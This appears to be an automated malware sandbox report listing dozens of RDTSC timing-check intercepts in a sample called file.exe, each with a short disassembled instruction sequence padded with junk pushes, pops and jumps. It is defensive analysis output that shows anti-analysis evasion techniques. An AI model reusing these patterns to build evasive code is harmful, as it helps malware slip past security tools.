Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D41D70 second address: D41D76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4C714 second address: D4C744 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1675279DAAh 0x00000008 jmp 00007F1675279DB0h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 js 00007F1675279DAEh 0x00000016 jp 00007F1675279DA6h 0x0000001c push edi 0x0000001d pop edi 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4C744 second address: D4C74C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4B440 second address: D4B445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4BA5D second address: D4BA6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F1674F90E16h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4BA6C second address: D4BA70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4BD03 second address: D4BD3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F1674F90E16h 0x0000000a popad 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e pushad 0x0000000f popad 0x00000010 jnc 00007F1674F90E16h 0x00000016 popad 0x00000017 pushad 0x00000018 push edx 0x00000019 jmp 00007F1674F90E29h 0x0000001e pushad 0x0000001f popad 0x00000020 pop edx 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4C3E1 second address: D4C409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F1675279DB7h 0x0000000c jmp 00007F1675279DAAh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4C409 second address: D4C448 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1674F90E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jp 00007F1674F90E16h 0x00000013 jnc 00007F1674F90E16h 0x00000019 popad 0x0000001a popad 0x0000001b push esi 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F1674F90E1Ch 0x00000023 jmp 00007F1674F90E25h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4C448 second address: D4C454 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4C454 second address: D4C458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4F486 second address: D4F4B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnc 00007F1675279DBFh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE099E second address: CE09A8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1674F90E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE09A8 second address: CE09AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D54A4C second address: D54A52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D54A52 second address: D54A57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D54A57 second address: D54A68 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1674F90E1Ch 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D54A68 second address: D54A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5386F second address: D53874 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D53874 second address: D5387A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D26208 second address: D0716C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ebp 0x00000009 call 00007F1674F90E18h 0x0000000e pop ebp 0x0000000f mov dword ptr [esp+04h], ebp 0x00000013 add dword ptr [esp+04h], 00000015h 0x0000001b inc ebp 0x0000001c push ebp 0x0000001d ret 0x0000001e pop ebp 0x0000001f ret 0x00000020 cld 0x00000021 lea eax, dword ptr [ebp+12487FA0h] 0x00000027 xor dword ptr [ebp+12459526h], edx 0x0000002d nop 0x0000002e jc 00007F1674F90E2Fh 0x00000034 push eax 0x00000035 jmp 00007F1674F90E27h 0x0000003a pop eax 0x0000003b push eax 0x0000003c push eax 0x0000003d push ecx 0x0000003e push esi 0x0000003f pop esi 0x00000040 pop ecx 0x00000041 pop eax 0x00000042 nop 0x00000043 mov dword ptr [ebp+1245224Fh], esi 0x00000049 call dword ptr [ebp+1244DF9Bh] 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 pushad 0x00000053 popad 0x00000054 pushad 0x00000055 popad 0x00000056 jne 00007F1674F90E16h 0x0000005c ja 00007F1674F90E16h 0x00000062 popad 0x00000063 push eax 0x00000064 push edx 0x00000065 push esi 0x00000066 pop esi 0x00000067 jg 00007F1674F90E16h 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D26314 second address: D263DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edi 0x00000007 jmp 00007F1675279DB7h 0x0000000c pop edi 0x0000000d xchg eax, ebx 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F1675279DA8h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 jmp 00007F1675279DB1h 0x0000002d xor edx, dword ptr [ebp+122D3702h] 0x00000033 push dword ptr fs:[00000000h] 0x0000003a jmp 00007F1675279DACh 0x0000003f js 00007F1675279DA6h 0x00000045 mov dword ptr fs:[00000000h], esp 0x0000004c cld 0x0000004d mov dword ptr [ebp+12487FF8h], esp 0x00000053 mov ch, CCh 0x00000055 cmp dword ptr [ebp+122D366Ah], 00000000h 0x0000005c jne 00007F1675279E7Fh 0x00000062 adc dh, FFFFFFB9h 0x00000065 mov byte ptr [ebp+122D3214h], 00000047h 0x0000006c jl 00007F1675279DA8h 0x00000072 mov eax, D49AA7D2h 0x00000077 or edi, dword ptr [ebp+12458111h] 0x0000007d nop 0x0000007e pushad 0x0000007f push eax 0x00000080 push edx 0x00000081 jmp 00007F1675279DB6h 0x00000086 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D26ADD second address: D26AE7 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1674F90E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D26BD2 second address: D26BF9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F1675279DB7h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007F1675279DA6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D26BF9 second address: D26C19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1674F90E28h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE7412 second address: CE7416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE7416 second address: CE745C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E29h 0x00000007 jmp 00007F1674F90E1Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jns 00007F1674F90E2Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE745C second address: CE747E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1675279DACh 0x00000008 jne 00007F1675279DACh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 push esi 0x00000014 pop esi 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D53E2F second address: D53E33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D53E33 second address: D53E39 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D53E39 second address: D53E53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007F1674F90E1Eh 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D53E53 second address: D53E74 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1675279DAEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F1675279DABh 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5414F second address: D54166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jc 00007F1674F90E1Eh 0x0000000f push esi 0x00000010 pop esi 0x00000011 jg 00007F1674F90E16h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D54596 second address: D5459B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5D06D second address: D5D078 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5D078 second address: D5D08C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F1675279DADh 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5D53E second address: D5D563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F1674F90E16h 0x0000000a jmp 00007F1674F90E29h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5D9CD second address: D5D9DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1675279DABh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5DF1D second address: D5DF26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5DF26 second address: D5DF3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1675279DAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5E589 second address: D5E59F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1674F90E16h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d je 00007F1674F90E16h 0x00000013 pushad 0x00000014 popad 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5E59F second address: D5E5A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5E5A6 second address: D5E5D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F1674F90E26h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007F1674F90E16h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5E5D0 second address: D5E5DA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1675279DA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5E5DA second address: D5E5F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b jl 00007F1674F90E16h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 jg 00007F1674F90E16h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5CD4C second address: D5CD50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5CD50 second address: D5CD5F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1674F90E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5CD5F second address: D5CD7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F1675279DA6h 0x0000000f jmp 00007F1675279DADh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5CD7B second address: D5CD7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D64364 second address: D64377 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push edx 0x0000000a pop edx 0x0000000b ja 00007F1675279DA6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D63034 second address: D63038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D63038 second address: D6303C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6303C second address: D63048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F1674F90E16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D632D1 second address: D632D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D632D5 second address: D632DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D63630 second address: D63636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D667EE second address: D667F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D667F4 second address: D667FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D667FD second address: D66801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D66801 second address: D66837 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jns 00007F1675279DA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jg 00007F1675279DBDh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jng 00007F1675279DA6h 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D66837 second address: D66841 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D66841 second address: D66847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D66847 second address: D66866 instructions: 0x00000000 rdtsc 0x00000002 js 00007F1674F90E16h 0x00000008 jmp 00007F1674F90E25h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D66866 second address: D6686E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D69578 second address: D695B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F1674F90E1Eh 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F1674F90E1Bh 0x00000014 jnl 00007F1674F90E16h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F1674F90E1Fh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D695B3 second address: D695B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6E299 second address: D6E2AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F1674F90E16h 0x0000000a jl 00007F1674F90E16h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6E2AB second address: D6E2B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D72120 second address: D72136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1674F90E1Bh 0x00000009 jc 00007F1674F90E16h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D72136 second address: D7213D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7213D second address: D7216C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1674F90E28h 0x00000009 popad 0x0000000a push eax 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jnp 00007F1674F90E24h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7216C second address: D72170 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D71515 second address: D71519 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D71519 second address: D71537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1675279DB8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D71537 second address: D7154D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F1674F90E16h 0x00000009 jmp 00007F1674F90E1Bh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7154D second address: D71555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D71555 second address: D7155B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D71828 second address: D7183B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 jc 00007F1675279DA6h 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D76A3B second address: D76A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D76A41 second address: D76A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D76A45 second address: D76A6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop ecx 0x0000000c popad 0x0000000d pushad 0x0000000e ja 00007F1674F90E23h 0x00000014 jmp 00007F1674F90E1Dh 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D76BD4 second address: D76BD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D76BD9 second address: D76BF2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 jmp 00007F1674F90E1Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D76D49 second address: D76D5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007F1675279DA6h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F1675279DA6h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D76D5F second address: D76D63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D76D63 second address: D76D7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F1675279DACh 0x00000012 jo 00007F1675279DA6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D76D7B second address: D76D80 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D76D80 second address: D76D94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F1675279DA6h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c ja 00007F1675279DA6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
